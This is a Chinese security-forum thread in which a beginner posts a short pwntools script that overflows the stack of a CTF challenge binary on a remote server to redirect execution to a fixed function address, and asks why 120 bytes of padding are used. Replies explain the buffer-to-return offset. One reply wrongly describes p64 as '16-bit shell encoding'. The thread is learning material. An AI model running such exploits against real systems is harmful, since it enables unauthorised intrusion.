[新手入门] 求教一题简单的栈溢出payload分析

[复制链接]
查看8449 | 回复4 | 2019-7-30 14:54:05 | 显示全部楼层 |阅读模式
from pwn import *
p=remote('129.211.58.26',10000)
p.recvuntil('Plz input letter exactly!\n')
payload='a'*(120)+p64(0x4006B6)
p.sendline(payload)
p.interactive()
加粗字体部分的 'a'*(120)是什么意思。。
然后 题目放在附件里了 希望有师傅可以教一下orz


easypwn.rar

2.59 KB, 下载次数: 24

回复

使用道具 举报

guo | 2019-8-10 23:07:11 | 显示全部楼层
因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。
回复

使用道具 举报

Arashialing | 2019-8-13 14:19:35 | 显示全部楼层
guo 发表于 2019-8-10 23:07
因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。

请问一下 这个地址相差 怎么看呢
回复

使用道具 举报

shaxin | 2019-8-21 16:24:56 | 显示全部楼层
120是栈内gets开始到ret的偏移,p64是16位的shell编码,0x4006B6是foo函数起始地址
回复

使用道具 举报

Arashialing | 2019-9-5 20:32:48 | 显示全部楼层
shaxin 发表于 2019-8-21 16:24
120是栈内gets开始到ret的偏移,p64是16位的shell编码,0x4006B6是foo函数起始地址

蟹蟹师傅
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

2

主题

12

帖子

63

积分

小有名气

Rank: 3Rank: 3

积分
63